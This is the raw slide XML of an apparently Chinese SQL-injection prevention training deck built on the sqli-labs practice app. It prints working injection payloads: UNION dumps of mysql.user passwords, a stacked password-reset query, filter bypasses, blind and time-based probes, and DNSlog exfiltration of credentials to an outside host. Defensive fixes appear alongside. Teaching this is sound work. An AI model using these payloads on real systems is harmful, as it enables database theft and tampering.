            </a:rPr>
            <a:t>1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>and 1=2 --</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7273086" y="3018127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D1017A8-C5FA-DD40-8733-15805D49E760}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="8769891" y="3859209"/>
          <a:ext cx="139092" cy="1390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6E1D8-228C-CC46-AC1F-F32B1DA83E27}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="7249807" y="4067848"/>
          <a:ext cx="3179259" cy="7948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访问异常</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7273086" y="4091127"/>
        <a:ext cx="3132701" cy="74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7C0F-16AB-4B9C-88D2-EF03126FDE4F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="2430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C923F-AFD1-45DC-9DED-96127DED69DF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="2430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数据库信息泄漏（拖库）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="2430"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{97D90C10-B72B-465C-A840-9720E5568AD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="837968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FD1B01-F7C4-46E4-81A0-8CA0673B8863}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="837968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数据库恶意操作（修改金额）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="837968"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F27C2BB-3790-43A6-B3FC-42170389D648}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="1673505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DECCE9-3F47-4DD2-BFA6-E970E2AB1644}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="1673505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网站挂马（植入网页木马）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="1673505"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{23C658F0-65FC-4131-A97D-246EAA5ECAD3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="2509043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FD5D8B-9F66-4838-94DA-76FA5D4CCB13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="2509043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网页篡改（挂标语）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="2509043"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2278B80B-133A-45A7-AC6E-38851CED986C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="3344580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8168FD-4B68-4DD6-82B5-0F37B3C2E0C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="3344580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安装后门</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="3344580"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{30A5B66D-80B2-49F9-90B4-359B4D9DBA78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="4180117"/>
          <a:ext cx="835537" cy="8355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567578-90E9-4C1F-AA15-627382938DDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="4180117"/>
          <a:ext cx="4457897" cy="83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获取系统权限</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="4180117"/>
        <a:ext cx="4457897" cy="83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#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4DA-E0FD-49E5-87A2-6498FE813F51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0C82D-2687-4AEF-B221-55CB30CBF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C82D-2687-4AEF-B221-55CB30CBFBD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/sqli-labs/Less-1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>id=1' UNION (SELECT 0,User,Password FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>) ORDER BY id; -- 1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-labs/Less-38/?id=1';update users set password='test' where username='Dumb';-- 1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/sqli-labs/Less-23/?id=1' or 1=1 -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/sqli-labs/Less-23/?id=1' or 1=1 or 1='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/sqli-labs/Less-25/?id=1' or 1=1 -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/sqli-labs/Less-25/?id=1' o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>r 1=1 -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/sqli-labs/Less-25/?id=1' || 1=1 -- 1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/sqli-labs/Less-26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>d=1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or 1=1 or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/sqli-labs/Less-26b/?id=1'/**/or/**/1=1/**/or/**/1='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/sqli-labs/Less-27b/?id=1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>0,User,Password FROM mysql.user) ORDER BY id; -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/sqli-labs/Less-27b/?id=1' uNion (sElect 0,User,Password FROM mysql.user) ORDER BY id; -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/sqli-labs/Less-27b/?id=1' UNUNIONION (SESELECTLECT 0,User,Password FROM mysql.user) ORDER BY id; -- 1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C82D-2687-4AEF-B221-55CB30CBFBDB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C82D-2687-4AEF-B221-55CB30CBFBDB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C82D-2687-4AEF-B221-55CB30CBFBD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/sqli-labs/Less-1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1' UNION (SELECT 0,User,Password FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) ORDER BY id; -- 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>stristr($id, 'union'))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>preg_match('/union/i', $id)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/sqli-labs/Less-1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1' UNION (SELECT 0,User,Password FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) ORDER BY id; -- 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>!is_numeric($id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>!preg_match('/^\d+$/', $id)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$sql="SELECT * FROM users WHERE id=? LIMIT 0,1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$pdo=new PDO("mysql:host=$host;dbname=$dbname", $dbuser, $dbpass);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$stmt = $pdo-&gt;prepare($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$stmt-&gt;bindParam(1,$id);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$stmt-&gt;execute();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$row = $stmt-&gt;fetch();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/etc/php/5.6/apache2/php.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>UPDATE mysql.user SET File_priv = 'N' WHERE User='root';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>FLUSH PRIVILEGES;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/var/www/html/sqli-labs/sql-connections/db-creds.inc，用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GRANT ALL ON `security`.* TO `login`@`%`;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FLUSH PRIVILEGES;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/sqli-labs/Less-1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?id=1234'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/sqli-labs/Less-1/?id=1' union select 1,updatexml(1,concat(0x7e,database()),1) -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/sqli-labs/Less-1/?id=1' union select 1,updatexml(1,concat(0x7e,VERSION()),1) -- 1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/sqli-labs/Less-11/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-labs/Less-8/?id=1' and 1=1 -- 1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-labs/Less-8/?id=1' and 1=2 -- 1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-labs/Less-8/?id=1' and length(database())=7 -- 1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-labs/Less-8/?id=1' and length(database())=8 -- 1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-labs/Less-9/?id=1' and sleep(3) -- 1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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs/Less-9/?id=1' and if(length(database())=8 ,sleep(3),true) -- 1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http://dnslog.cn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或http://ceye.io/创建一个子域</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1/Less-1/?id=1' AND (LOAD_FILE(CONCAT('\\\\mark-',VERSION(),'-mark.n0hx4a.dnslog.cn\\111'))) -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1/Less-1/?id=1' AND (LOAD_FILE(CONCAT('\\\\mark-',(SELECT CONCAT(`username`,'-',`password`) FROM users WHERE username = 'superman'),'-mark.n0hx4a.dnslog.cn\\111'))) -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1/Less-1/?id=1' AND (LOAD_FILE(CONCAT('\\\\mark-',(SELECT REPLACE(GROUP_CONCAT(`TABLE_NAME`),',','-') FROM information_schema.TABLES where TABLE_SCHEMA='security'),'-mark.n0hx4a.dnslog.cn\\111'))) -- 1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3455" y="2001329"/>
            <a:ext cx="9991602" cy="1379180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="7200"/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53546" y="3602038"/>
            <a:ext cx="7461511" cy="644498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单击以编辑副标题样式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195848" y="1336459"/>
            <a:ext cx="419209" cy="411013"/>
            <a:chOff x="691349" y="533565"/>
            <a:chExt cx="419209" cy="411013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="等腰三角形 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="805597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5400000">
              <a:off x="585296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0455"/>
            <a:ext cx="3927423" cy="3447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4" y="6172978"/>
            <a:ext cx="2060083" cy="298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456841"/>
            <a:ext cx="2628900" cy="4720122"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编辑文本样式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456841"/>
            <a:ext cx="7734300" cy="4720122"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270861" y="76290"/>
            <a:ext cx="10082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30515"/>
            <a:ext cx="5381469" cy="47239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04509" y="2107300"/>
            <a:ext cx="7287491" cy="1379180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="8800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入结束语！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1195848" y="1336459"/>
            <a:ext cx="419209" cy="411013"/>
            <a:chOff x="691349" y="533565"/>
            <a:chExt cx="419209" cy="411013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="等腰三角形 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="805597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5400000">
              <a:off x="585296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42" y="6185859"/>
            <a:ext cx="2060083" cy="298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01858" y="365126"/>
            <a:ext cx="10051942" cy="828244"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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01858" y="1825625"/>
            <a:ext cx="10051942" cy="435133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2434442" y="3180271"/>
            <a:ext cx="7493329" cy="8421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5650504" y="1882868"/>
            <a:ext cx="948006" cy="94800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743963" y="1976327"/>
            <a:ext cx="761088" cy="761088"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B3E2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34442" y="3181027"/>
            <a:ext cx="7493329" cy="841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 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246536" y="4184327"/>
            <a:ext cx="3906864" cy="13335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单击以编辑说明内容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5737696" y="1976327"/>
            <a:ext cx="767356" cy="7528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6317397"/>
            <a:ext cx="1437321" cy="207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70861" y="91788"/>
            <a:ext cx="10082939" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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355600" indent="-355600">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 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55600" indent="-355600">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 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9239" y="10477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defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 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defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 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3778" y="262154"/>
            <a:ext cx="10041610" cy="987425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658318"/>
            <a:ext cx="6172200" cy="43422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658318"/>
            <a:ext cx="3932237" cy="435015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627322"/>
            <a:ext cx="6172200" cy="423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627437"/>
            <a:ext cx="3932237" cy="424155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313778" y="262154"/>
            <a:ext cx="10041610" cy="987425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70861" y="91788"/>
            <a:ext cx="10082939" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑标题样式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6412493"/>
            <a:ext cx="1437321" cy="2079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0861" y="76290"/>
            <a:ext cx="10082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860" y="1825625"/>
            <a:ext cx="10082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91349" y="533565"/>
            <a:ext cx="419209" cy="411013"/>
            <a:chOff x="691349" y="533565"/>
            <a:chExt cx="419209" cy="411013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="等腰三角形 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="805597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5400000">
              <a:off x="585296" y="639618"/>
              <a:ext cx="411013" cy="1989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6304518"/>
            <a:ext cx="1437321" cy="207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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="68B92E"/>
        </a:buClr>
        <a:buSzPct val="9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15" y="2238676"/>
            <a:ext cx="10652680" cy="108386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dirty="0"/>
              <a:t>Web安全主题</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击防范培训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1733" y="4099357"/>
            <a:ext cx="7600338" cy="799480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2022/08/18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关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的历史安全事件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457960"/>
            <a:ext cx="5534025" cy="4500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70" y="1457960"/>
            <a:ext cx="5934075" cy="45002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795" y="6122035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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以上截图来自互联网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暗网售卖数据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1795" y="6122035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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以上截图来自互联网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3475" y="1054735"/>
            <a:ext cx="99250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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入产生原因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5288" y="1292909"/>
            <a:ext cx="4444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$name=$_POST['username']; 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$pwd=$_POST['password']; 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$sql="select * from admin where user='$name' and password='$pwd'"; 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$query=mysql_query($sql);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5246594" y="1104651"/>
            <a:ext cx="6320118" cy="429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80"/>
              </a:lnSpc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当提交正常数据用户名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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2280"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr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* from admin where user=‘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admin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and password=‘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ts val="2280"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr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当构造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语句提交用户名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1’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‘1’=‘1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280"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="19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select * from admin where user=‘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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="19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 and password=‘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1’or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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9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9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63955" y="3668244"/>
            <a:ext cx="9398001" cy="2428006"/>
            <a:chOff x="1308769" y="3996177"/>
            <a:chExt cx="9398001" cy="2428006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1308769" y="3996177"/>
              <a:ext cx="9398001" cy="2133099"/>
              <a:chOff x="1308769" y="3996177"/>
              <a:chExt cx="9398001" cy="2133099"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="图片 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433" y="4097292"/>
                <a:ext cx="1356359" cy="1344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图片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553" y="4232335"/>
                <a:ext cx="829733" cy="1219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Freeform 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5025636" y="5817331"/>
                <a:ext cx="4741333" cy="311945"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4200"/>
                  <a:gd name="T1" fmla="*/ 2147483647 h 410"/>
                  <a:gd name="T2" fmla="*/ 2147483647 w 4200"/>
                  <a:gd name="T3" fmla="*/ 2147483647 h 410"/>
                  <a:gd name="T4" fmla="*/ 2147483647 w 4200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4200"/>
                  <a:gd name="T10" fmla="*/ 0 h 410"/>
                  <a:gd name="T11" fmla="*/ 4200 w 4200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00" h="410">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="682" y="211"/>
                      <a:pt x="1364" y="410"/>
                      <a:pt x="2064" y="408"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2764" y="406"/>
                      <a:pt x="3838" y="52"/>
                      <a:pt x="4200" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="57150">
                <a:solidFill>
                  <a:srgbClr val="66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025"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="AutoShape 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9226797" y="5462759"/>
                <a:ext cx="1479973" cy="345131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2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025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login.php</a:t>
                </a:r>
                <a:endPara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1864" y="4106105"/>
                <a:ext cx="2226635" cy="1461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>
                <a:off x="3669277" y="5446384"/>
                <a:ext cx="1498599" cy="345131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2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系统管理员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308769" y="3996177"/>
